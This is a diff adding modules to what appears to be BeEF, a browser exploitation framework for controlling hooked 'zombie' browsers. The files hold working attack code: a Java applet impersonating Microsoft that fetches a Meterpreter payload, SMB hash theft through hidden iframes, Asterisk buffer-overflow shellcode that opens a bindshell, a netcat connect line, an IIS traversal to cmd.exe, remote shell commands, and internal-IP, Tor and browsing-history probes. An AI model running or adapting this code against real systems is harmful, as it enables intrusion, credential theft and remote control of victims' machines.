// init pane
msf_get_exploit_list();
</script>

1
modules/browser/msf_browser_expliot/name.txt Normal file
View File

@@ -0,0 +1 @@
MSF Browser Exploit

14
modules/browser/msf_browser_expliot/template.js Normal file
View File

@@ -0,0 +1,14 @@
// iframe.setAttribute("style", "visibility:hidden;"); doesn't work with ie
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = 'URL';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Launched Metasploit Module";
}
return_result(result_id, do_main());

65
modules/browser/msf_capture_hashes/index.php Normal file
View File

@@ -0,0 +1,65 @@
<?
// Copyright (c) 2009, Ryan Linn (sussurro@happypacket.net)
// All Rights Reserved
// Template for code by:
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<!--
BeEF: the following is the boiler plate from the exploit
-->
<script language="javascript" type="text/javascript">
var rtnval = "OK Clicked";
Element.Methods.construct_code = function($url) {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
b64code = b64replace(b64code, "URL",$url);
// send the code to the zombies
do_send(b64code);
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Metasploit SMB Challenge Theft</div>
This module launches a Metasploit listener that attempts to covertly steal SMB Challenge hashes. Once
the Metasploit module has been launched, the targeted zombies will be redirected to Metasploit to attempt
to capture credentials.<br><br>
Setup MSF to allow BeEF access (settings in /beef/ui/msf.php):<br>
<pre>
sudo ./msfconsole
msf > load xmlrpc Pass=BeEFMSFPass
</pre>
<div id="module_subsection">
<form name="myform" id="myform">
<div id="module_subsection_header">SRVHOST (Required)</div>
<input type="text" name="SRVHOST" value="0.0.0.0"/>
<div id="module_subsection_header">SRVPORT (Required)</div>
<input type="text" name="SRVPORT" value="8080"/>
<div id="module_subsection_header">URIPATH</div>
<input type="text" name="URIPATH" value="beef"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:msf_smb_challenge_capture()"/><br>
</form>
<div class="entry">
<br>
After a successful exploitation the results can be found:<br>
<a href=../cache/logfile>Captured hashes</a><br>
<a href=../cache/pwfile>Captured hashes (Cain &amp; Able format)</a>
</div>
</div>

1
modules/browser/msf_capture_hashes/name.txt Normal file
View File

@@ -0,0 +1 @@
MSF SMB Challenge Theft

14
modules/browser/msf_capture_hashes/template.js Normal file
View File

@@ -0,0 +1,14 @@
// iframe.setAttribute("style", "visibility:hidden;"); doesn't work with ie
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = 'URL';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Launched Metasploit SMB Credential Theft";
}
return_result(result_id, do_main());

BIN
modules/browser/msf_malicious_java_applet/SignedUpdate.jar Executable file
View File

Binary file not shown.

BIN
modules/browser/msf_malicious_java_applet/Update.class Executable file
View File

Binary file not shown.

54
modules/browser/msf_malicious_java_applet/index.php Executable file
View File

@@ -0,0 +1,54 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
//
// Module by: Joshua "Jabra" Abraham
// jabra@spl0it.org
// http://blog.spl0it.org
//
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
function get_b64_code_msf_applet() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
// do some super escaping
msfcmd_str = document.myform.msfcmd.value;
// replace sections of the code with user input
b64code = b64replace(b64code, "BAR",msfcmd_str);
b64code = b64replace(b64code, "FOO",msfcmd_str);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Mozilla nsIProcess Interface', get_b64_code_msf_applet());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_msf_applet());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Metasploit Payload Java Applet</div>
This module will execute a command on the client. The client will receive a Java Applet popup. <br><br>
The certificate is self-signed by the Microsoft Corporation.<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">URL to Download Meterpreter Payload</div>
<input type="text" name="msfcmd" value="http://<?=$_SERVER['SERVER_NAME']?>/beef/beef.exe"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/browser/msf_malicious_java_applet/name.txt Executable file
View File

@@ -0,0 +1 @@
MSF Payload Java Applet

23
modules/browser/msf_malicious_java_applet/template.js Executable file
View File

@@ -0,0 +1,23 @@
// ie doesn't play nice with dynamic loading of jars - below is a link to what sun recommends
// if any knows a nicer way to do this drop me an email
// http://java.sun.com/javase/6/docs/technotes/guides/plugin/developer_guide/using_tags.html#javascript
function applet() {
var _app = navigator.appName;
var malicious = document.createElement("div");
if (_app == 'Microsoft Internet Explorer') {
malicious.innerHTML = '<OBJECT classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0">> <PARAM name="codebase" value="../modules/browser/malicious_msf_applet"> <PARAM name="code" value="Update.class"> <PARAM name="archive" value="SignedUpdate.jar"> <PARAM name="msfcmd" value="BAR"> </OBJECT>>';
} else {
malicious.innerHTML = '<OBJECT width="0" height="0" codebase="../modules/browser/malicious_msf_applet/" archive="SignedUpdate.jar" code="Update" type="application/x-java-applet;version=1.6"> <PARAM name="msfcmd" value="FOO"> </OBJECT>';
}
document.body.appendChild(malicious);
return_result(result_id, "Appet running");
}
applet();

55
modules/network/asterisk_ipe/index.php Normal file
View File

@@ -0,0 +1,55 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
var rtnval = "OK Clicked";
Element.Methods.construct_code = function() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "IP_ADDRESS", document.myform.alert_str.value);
b64code = b64replace(b64code, "USERNAME", document.myform.username_str.value);
b64code = b64replace(b64code, "SECRET", document.myform.secret_str.value);
// send the code to the zombies
do_send(b64code);
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Asterisk (Inter-protocol Exploit)</div>
This module will exploit the asterisk (1.0.7) manager vulnerability from the browser. The
payload is a bindshell on port 4444. <br><br>
The Bindshell Inter-protocol Communication module or following command will connect to the listening bindshell:
<pre>
nc asteriskserverip 4444
</pre>
<!--<a href=http://www.bindshell.net/papers/ipe>Inter-protocol Exploitation</a><br>-->
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Target Address</div>
<input type="text" name="alert_str" value="localhost"/>
<div id="module_subsection_header">Username</div>
<input type="text" name="username_str" value="mark"/>
<div id="module_subsection_header">Secret</div>
<input type="text" name="secret_str" value="mysecret"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:construct_code()"/>
</form>
</div>
<div class="entry">
<br>
</div>

1
modules/network/asterisk_ipe/name.txt Normal file
View File

@@ -0,0 +1 @@
Asterisk IPE

78
modules/network/asterisk_ipe/template.js Normal file
View File

@@ -0,0 +1,78 @@
var target_ip = 'IP_ADDRESS';
var target_port = '5038';
var payload = '';
// shellcode creates a bindshell on port 4444
var shellcode = "0D0A" +
"416374696F6E3A20436F6D6D61" +
"6E640D0A436F6D6D616E643A20222209" +
"22220922220922220922220922220922" +
"22092222092222092222092222092222" +
"09222209222209222209222209222209" +
"22220922220922220922220922220922" +
"22092222092222092222092222092222" +
"09222209222209222209222209222209" +
"22220922220922220922220922220922" +
"22092222092222092222092222092222" +
"09222209222209222209222209222209" +
"22220922220922220922220922220922" +
"22092222092222092222092222092222" +
"09222209222209222209222209222209" +
"22220922220922220922220922220922" +
"22092222545B81EB0101010181C35B04" +
"01019090FFE30D0A416374696F6E4944" +
"3A20EB0359EB05E8F8FFFFFF4F494949" +
"494949515A5654583633305658344130" +
"42364848304233304243565832424442" +
"48344132414430414454424451423041" +
"44415658345A3842444A4F4D41334B4D" +
"4335435443354C5644504C5648364A45" +
"49394958414E4D4C4238484943444445" +
"48564A5641414E45483643354938414E" +
"4C5648564A354255413548554938414E" +
"4D4C4258424B4856414D434E4D4C4238" +
"44354435485543444948414E424B4846" +
"4D4C424843594C3644504955424B4F53" +
"4D4C425849344937494F424B4B504435" +
"4A464F424F3243474A464A464F324456" +
"493650364948434E445543454948414E" +
"4D4C42385A0D0A0D0A0D0A" + "0D0A0D61";
var iframe = document.createElement("iframe");
iframe.setAttribute("id","iwindow");
//iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
function do_submit(ip, port, content) {
myform=document.createElement("form");
myform.setAttribute("name","data");
myform.setAttribute("method","post");
myform.setAttribute("enctype", "multipart/form-data");
myform.setAttribute("action","http://" + ip +
":" + port + "/abc.html");
document.getElementById("iwindow").contentWindow.document.body.appendChild(myform);
myExt = document.createElement("INPUT");
myExt.setAttribute("id","extNo");
myExt.setAttribute("name","test");
myExt.setAttribute("value",content);
myform.appendChild(myExt);
myform.submit();
}
payload += "Action: login\n";
payload += "Username: USERNAME\n";
//payload += "Username: mark\n";
payload += "Secret: SECRET\n";
//payload += "Secret: mysecret\n";
for (var i = 0; i<shellcode.length; i+=2) {
hexstr = shellcode.substring(i,i+2);
decval = parseInt(hexstr,16);
payload += String.fromCharCode(decval);
}
do_submit(target_ip, target_port, payload);

61
modules/network/bindshell_ipc/index.php Normal file
View File

@@ -0,0 +1,61 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
var rtnval = "OK Clicked";
Element.Methods.construct_code = function() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
var temp_cmds = document.myform.cmd_str.value;
temp_cmds = temp_cmds.replace(/\n/g, "\\n")
// replace sections of the code with user input
b64code = b64replace(b64code, "IP_ADDRESS", document.myform.ip_str.value);
b64code = b64replace(b64code, "PORT", document.myform.port_str.value);
b64code = b64replace(b64code, "COMMAND", temp_cmds);
// send the code to the zombies
do_send(b64code);
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Bindshell (Inter-protocol Communication)</div>
<div class="entry">
Using <a href=http://www.bindshell.net/papers/ipc>Inter-protocol Communication</a> the
zombie browser will send commands to a listening bindshell. The target address can be
on the zombie's subnet which is potentially not directly accessible from the Internet.
</div>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Target Address</div>
<input type="text" name="ip_str" value="localhost"/>
<div id="module_subsection_header">Port</div>
<input type="text" name="port_str" value="4444"/>
<div id="module_subsection_header">Commands</div>
note: the semicolons and exit command are required
<textarea name="cmd_str" rows="5" cols="80">id;ls /;pwd;
pkill asterisk;
exit;
</textarea>
<input class="button" type="button" value=" Send Now " onClick="javascript:construct_code()"/>
</form>
</div>

1
modules/network/bindshell_ipc/name.txt Normal file
View File

@@ -0,0 +1 @@
Bindshell IPC

89
modules/network/bindshell_ipc/template.js Normal file
View File

@@ -0,0 +1,89 @@
var target_ip = 'IP_ADDRESS';
var target_port = '220';
var payload = "";
var scr_l = '<scr' + 'ipt\>';
var scr_r = '</scr' + 'ipt>';
var max_line_len = 23;
payload += "ls\\\n";
function add_line(cmd) {
payload += "echo -n '" + scr_l + "'\\\n";
payload += "echo " + cmd + "\\\n";
payload += "echo '" + scr_r + "'\\\n";
}
function add_echo(cmd) {
payload += "echo " + "\\\"" + cmd + "\\\"" + "\\\n";
}
function construct_js(js) {
add_line("a=''");
js = js.replace(/ /g, "SP")
//for(i=0; i<js.length; i+=max_line_len) {
// add_line("a+=\\\""+js.substring(i,i+max_line_len)+"\\\"");
//}
add_line("\\\"" + js +"\\\"");
add_line("s=String.fromCharCode(0x20)");
add_line("a=a.replace(/SP/g,s)");
}
var code = "";
function add_js(js) {
code+=js+";";
}
//payload+=String.fromCharCode(0x12);
//payload+=String.fromCharCode(0x13);
//payload += "fi\\\n";
add_echo(scr_l);
add_echo("var result_id='" + result_id + "'");
add_echo("function include(script_filename) {");
add_echo("var html_doc = document.getElementsByTagName('head').item(0);");
add_echo("var js = document.createElement('script');");
add_echo("js.src = script_filename;");
add_echo("js.type = 'text/javascript';");
add_echo("js.defer = true;");
add_echo("html_doc.appendChild(js);");
add_echo("return js;");
add_echo("}");
add_echo("include('" + beef_url + "' + '/hook/ipc_bindshell.js.php');");
add_echo("//__END__");
add_echo(scr_r);
payload += "COMMAND";
var iframe = document.createElement("iframe");
iframe.setAttribute("id","iwindow");
//iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
function do_submit(ip, port, content) {
myform=document.createElement("form");
myform.setAttribute("name","data");
myform.setAttribute("method","post");
myform.setAttribute("enctype", "multipart/form-data");
myform.setAttribute("action","http://" + ip +
":" + PORT + '/abc.html;sh;');
//":" + PORT + "/abc.html");
document.getElementById("iwindow").contentWindow.document.body.appendChild(myform);
myExt = document.createElement("INPUT");
myExt.setAttribute("id","extNo");
myExt.setAttribute("name","test");
myExt.setAttribute("value",content);
myform.appendChild(myExt);
myform.submit();
}
do_submit(target_ip, target_port, payload);

46
modules/network/browser_redirect/index.php Normal file
View File

@@ -0,0 +1,46 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
get_b64_code_redirect = function () {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "REDIRECTURL", document.myform.url_str.value);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Browser Redirect', get_b64_code_redirect());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_redirect());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Redirect Browser</div>
This module will redirect the selected zombie browsers to the address specified in the
'Redirect URL' input.<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Redirect URL</div>
<input type="text" width="90%" name="url_str" value="http://www.bindshell.net/"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/network/browser_redirect/name.txt Normal file
View File

@@ -0,0 +1 @@
Browser Redirect

6
modules/network/browser_redirect/template.js Normal file
View File

@@ -0,0 +1,6 @@
function do_main(){
return_result(result_id, "Redirecting now");
window.location = "REDIRECTURL";
}
do_main();

45
modules/network/browser_request/index.php Normal file
View File

@@ -0,0 +1,45 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
var rtnval = "Request Received";
function get_b64_code_request() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
// replace sections of the code with user input
b64code = b64replace(b64code, "URL",document.myform.url_string.value);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Browser Request', get_b64_code_request());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_request());
}
// add construct code to DOM
Element.addMethods();
</script>
<div id="module_header">Browser Request</div>
This module will create an iFrame and send a request to the URL specified below.<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">Request URL</div>
<input type="text" name="url_string" value="http://localhost/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir"/>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/network/browser_request/name.txt Normal file
View File

@@ -0,0 +1 @@
Browser Request

17
modules/network/browser_request/template.js Normal file
View File

@@ -0,0 +1,17 @@
// iframe.setAttribute("style", "visibility:hidden;"); doesn't work with ie
function do_main(){
var iframe = document.createElement('iframe');
iframe.src = 'URL';
iframe.setAttribute("width", "1");
iframe.setAttribute("height", "1");
iframe.setAttribute("style", "visibility:hidden;");
document.body.appendChild(iframe);
return "Request Sent";
}
var result_value = do_main();
return_result(result_id, result_value);

40
modules/network/detect_host_ip/index.php Normal file
View File

@@ -0,0 +1,40 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
get_b64_code_internalip = function () {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Detect Host IP', get_b64_code_internalip());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_internalip());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Detect Host IP</div>
This module will detect the host IP of the selected zombie browsers.<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header">
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/network/detect_host_ip/name.txt Normal file
View File

@@ -0,0 +1 @@
Detect Host IP

21
modules/network/detect_host_ip/template.js Normal file
View File

@@ -0,0 +1,21 @@
// code from http://code.google.com/p/attackapi/
var internalIP = "";
function do_main(){
try {
var sock = new java.net.Socket();
sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port));
internalIP = sock.getLocalAddress().getHostAddress();
} catch (e) {
internalIP = 'failed';
}
}
do_main();
return_result(result_id, internalIP);

40
modules/network/detect_hostname/index.php Normal file
View File

@@ -0,0 +1,40 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
get_b64_code_internalhostname = function () {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Detect Hostname', get_b64_code_internalhostname());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_internalhostname());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Detect Hostname</div>
This module will detect the hostname of the selected zombie browsers.<br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header"></div>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/network/detect_hostname/name.txt Normal file
View File

@@ -0,0 +1 @@
Detect Hostname

21
modules/network/detect_hostname/template.js Normal file
View File

@@ -0,0 +1,21 @@
// code from http://code.google.com/p/attackapi/
var internalhostname = "";
function do_main(){
try {
var sock = new java.net.Socket();
sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port));
internalhostname = sock.getLocalAddress().getHostName();
} catch (e) {
internalhostname = 'failed';
}
}
do_main();
return_result(result_id, internalhostname);

46
modules/network/detect_tor/index.php Executable file
View File

@@ -0,0 +1,46 @@
<?
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
// Module by: Joshua "Jabra" Abraham <jabra@spl0it.org>
// http://blog.spl0it.org
// Thu Jul 9 02:09:25 EDT 2009
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
function get_b64_code_tor_enabled() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<? echo get_b64_file(JS_FILE); ?>';
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Detect ToR', get_b64_code_tor_enabled());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_tor_enabled());
}
// add construct code to DOM
Element.addMethods();
</script>
<!-- PAGE CONTENT -->
<div id="module_header">Detect TOR</div>
This module will detect if the zombie is using TOR (The Onion Router). <br><br>
<div id="module_subsection">
<form name="myform">
<div id="module_subsection_header"></div>
<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
</form>
</div>

1
modules/network/detect_tor/name.txt Executable file
View File

@@ -0,0 +1 @@
Detect TOR

25
modules/network/detect_tor/template.js Executable file
View File

@@ -0,0 +1,25 @@
function using_tor() {
result = "Tor is being used";
}
function not_using_tor() {
result = "Tor is NOT being used";
}
function do_main() {
var img = new Image();
img.onload = using_tor();
img.onerror = not_using_tor();
img.setAttribute("width", "0");
img.setAttribute("height", "0");
img.setAttribute("style", "visibility:hidden;");
img.src = 'http://dige6xxwpt2knqbv.onion/wink.gif';
document.body.appendChild(img);
return "Request Sent";
}
var result = null;
do_main();
return_result(result_id, result);

499
modules/network/detect_visited_urls/alexa.txt Normal file
View File

@@ -0,0 +1,499 @@
# Top 500 sites from Alexa (2006-04-21)
yahoo.com
google.com
youtube.com
live.com
msn.com
myspace.com
wikipedia.org
facebook.com
blogger.com
yahoo.co.jp
orkut.com
rapidshare.com
baidu.com
microsoft.com
google.co.in
google.de
qq.com
ebay.com
hi5.com
google.fr
aol.com
mail.ru
google.co.uk
sina.com.cn
fc2.com
photobucket.com
google.com.br
amazon.com
imdb.com
vkontakte.ru
google.it
google.es
google.cn
imageshack.us
youporn.com
wordpress.com
google.co.jp
yandex.ru
flickr.com
friendster.com
skyrock.com
adultfriendfinder.com
go.com
odnoklassniki.ru
google.com.mx
bbc.co.uk
craigslist.org
dailymotion.com
redtube.com
cnn.com
163.com
mininova.org
googlesyndication.com
taobao.com
google.ca
livejournal.com
fotolog.net
uol.com.br
imagevenue.com
ebay.de
naver.com
mixi.jp
rakuten.co.jp
rambler.ru
espn.go.com
free.fr
livedoor.com
rediff.com
nicovideo.jp
adobe.com
sohu.com
apple.com
56.com
yourfilehost.com
veoh.com
perfspot.com
deviantart.com
about.com
google.com.tr
youku.com
globo.com
megaupload.com
google.pl
metroflog.com
google.ru
fastclick.com
clicksor.com
geocities.com
goo.ne.jp
google.co.id
ebay.co.uk
mediafire.com
yahoo.com.cn
partypoker.com
gamespot.com
download.com
nytimes.com
google.com.au
terra.com.br
wretch.cc
weather.com
thepiratebay.org
ign.com
bebo.com
depositfiles.com
google.com.sa
ask.com
nasza-klasa.pl
adultadworld.com
nba.com
google.com.ar
ameblo.jp
zshare.net
tudou.com
digg.com
google.nl
amazon.co.jp
4shared.com
aim.com
netlog.com
2ch.net
infoseek.co.jp
studiverzeichnis.com
isohunt.com
comcast.net
doubleclick.com
nifty.com
daum.net
sourceforge.net
usercash.com
geocities.jp
mop.com
badongo.com
cnet.com
onet.pl
google.co.th
easy-share.com
pornhub.com
megarotic.com
imeem.com
gmx.net
dell.com
ig.com.br
orange.fr
xunlei.com
metacafe.com
reference.com
biglobe.ne.jp
sakura.ne.jp
information.com
homeway.com.cn
multiply.com
888.com
livejasmin.com
zol.com.cn
realitykings.com
torrentz.com
libero.it
narod.ru
web.de
google.co.za
soso.com
mozilla.com
amazon.de
filefactory.com
ebay.it
google.com.eg
icq.com
brazzers.com
google.co.ve
allegro.pl
ucoz.ru
anonym.to
tinypic.com
alice.it
blogfa.com
vnexpress.net
wp.pl
wikimedia.org
hp.com
maktoob.com
mapquest.com
google.com.co
typepad.com
invisionfree.com
paypopup.com
mercadolibre.com.mx
schuelervz.net
sendspace.com
google.com.pk
ebay.fr
spiegel.de
hatena.ne.jp
google.be
seznam.cz
linkedin.com
answers.com
mercadolivre.com.br
xtube.com
dtiblog.com
dada.net
miniclip.com
xvideos.com
megaclick.com
softonic.com
bangbros1.com
adsrevenue.net
cricinfo.com
zedo.com
freewebs.com
hyves.nl
alibaba.com
xnxx.com
worldofwarcraft.com
bankofamerica.com
files.wordpress.com
badoo.com
hao123.com
filefront.com
google.com.pe
google.cl
google.com.vn
gamefaqs.com
seesaa.net
gougou.com
china.com
xanga.com
kooora.com
tom.com
google.gr
altervista.org
amazon.co.uk
zaycev.net
ocn.ne.jp
taringa.net
cyworld.com
indiatimes.com
ziddu.com
soufun.com
rapidshare.de
google.at
slide.com
bestbuy.com
tripod.com
liveinternet.ru
jugem.jp
flurl.com
fanfiction.net
thottbot.com
google.se
wwe.com
softpedia.com
pcpop.com
break.com
google.ch
chase.com
aebn.net
reuters.com
smileycentral.com
megavideo.com
marca.com
fling.com
eastmoney.com
debonairblog.com
altavista.com
xboard.us
freeones.com
myfreepaysite.com
netflix.com
google.ro
technorati.com
pchome.net
gametrailers.com
livescore.com
payserve.com
sonico.com
symantec.com
tagged.com
webshots.com
fotka.pl
google.com.my
last.fm
pornotube.com
ifolder.ru
tianya.cn
mozilla.org
archive.org
google.pt
gaiaonline.com
kaskus.us
target.com
yaplog.jp
21cn.com
walmart.com
tv.com
foxsports.com
dantri.com.vn
sogou.com
disney.go.com
ultimate-guitar.com
brazzersnetwork.com
uwants.com
ku6.com
dmm.co.jp
interia.pl
126.com
playstation.com
newgrounds.com
neopets.com
bangbros.com
runescape.com
xinhuanet.com
videosz.com
exblog.jp
foxnews.com
mywebsearch.com
istockphoto.com
elmundo.es
cocolog-nifty.com
nih.gov
newegg.com
skype.com
naukri.com
zango.com
match.com
shopping.com
sexyono.com
tu.tv
verycd.com
imagefap.com
blogchina.com
usps.com
att.com
yimg.com
wow-europe.com
mtv.com
washingtonpost.com
att.net
stumbleupon.com
cmfu.com
google.co.hu
milliyet.com.tr
esnips.com
forbes.com
livedoor.biz
vagos.es
wikia.com
engadget.com
leo.org
hurriyet.com.tr
porndirt.com
real.com
google.com.ph
monster.com
careerbuilder.com
over-blog.com
it168.com
letitbit.net
duowan.com
conduit.com
mobile9.com
mediaplex.com
clicksor.net
excite.co.jp
linternaute.com
hornymatches.com
wowhead.com
googlepages.com
startimes2.com
ebay.com.au
1und1.de
myvideo.de
rmxads.com
wamu.com
ups.com
meebo.com
jeuxvideo.com
no-ip.com
petardas.com
iwiw.hu
repubblica.it
dion.ne.jp
adult-empire.com
discuss.com.hk
msn.ca
vmn.net
so-net.ne.jp
starware.com
xbox.com
watch-movies.net
t-online.de
torrentreactor.net
utorrent.com
pornaccess.com
89.com
freelotto.com
univision.com
guardian.co.uk
btjunkie.org
rr.com
google.ae
verizon.net
teacup.com
mercadolibre.com.ar
expedia.com
forumfree.net
corriere.it
6park.com
ameba.jp
people.com.cn
mlb.com
shinobi.jp
minijuegos.com
ezinearticles.com
msplinks.com
xiaonei.com
pogo.com
iij4u.or.jp
forumcommunity.net
01net.com
ibm.com
dyndns.org
mynet.com
yam.com
google.com.ua
squidoo.com
mobile.de
google.dk
4chan.org
flixster.com
godaddy.com
wordreference.com
rude.com
110mb.com
bramjnet.com
people.com
sparkstudios.net
nokia.com
sapo.pt
zedge.net
wowarmory.com
chinaren.com
warez-bb.org
circuitcity.com
torrentz.ws
sify.com
thefreedictionary.com
nnm.ru
aweber.com
google.fi
moneycontrol.com
bild.de
commentcamarche.net
addictinggames.com
perezhilton.com
plala.or.jp
bharatstudent.com
tradedoubler.com
ifeng.com
ikea.com
kakaku.com
torrents.ru
crunchyroll.com
cartoonnetwork.com
google.com.tw
pchome.com.tw
allocine.fr
xhamster.com
wsj.com
vietnamnet.vn
hattrick.org
onemanga.com
abcnews.go.com
myway.com
juggcrew.com
spankwire.com
sweetim.com
dealtime.com
musica.com
atwiki.jp
marketgid.com
stage6.com
gyao.jp
fc2web.com
leonardo.it
whenu.com
zylom.com
buzznet.com
google.com.sg
adbrite.com
slickdeals.net
ebay.es
mforos.com
truveo.com
bangbrosnetwork.com
wannawatch.com
google.ie

587
modules/network/detect_visited_urls/index.php Normal file
View File

@@ -0,0 +1,587 @@
<?php
// Copyright (c) 2006-2009, Wade Alcorn
// All Rights Reserved
// wade@bindshell.net - http://www.bindshell.net
//
// Updates by: Joshua "Jabra" Abraham
// jabra@spl0it.org
// http://blog.spl0it.org
//
require_once("../../../include/common.inc.php"); // included for get_b64_file()
DEFINE('JS_FILE', './template.js');
?>
<script>
function get_b64_code_visited() {
// javascript is loaded from a file - it could be hard coded
var b64code = '<?php echo get_b64_file(JS_FILE); ?>';
var urllist = document.cmd_form.urls.value.split(/\r?\n/);
var result = urllist[0];
for (var i=1; i < urllist.length; i++) {
result += '!' + urllist[i];
}
// replace sections of the code with user input
b64code = b64replace(b64code, "RAWURLS", result);
return b64code;
}
Element.Methods.set_autorun = function() {
ar.enable('Detect Visited URLs', get_b64_code_visited());
}
Element.Methods.send_now = function() {
do_send(get_b64_code_visited());
}
// add construct code to DOM
Element.addMethods();
</script>
<div id="module_header">Detect Visited URLs</div>
This module will attempt to detect which URLs the zombie browser has visited. It
uses the list below which can be manually edited.<br><br>
<div id="module_subsection">
<form name="cmd_form">
<div id="module_subsection_header">URLs</div>
<textarea name="urls" rows="5" cols="80">
yahoo.com
google.com
youtube.com
live.com
msn.com
myspace.com
wikipedia.org
facebook.com
blogger.com
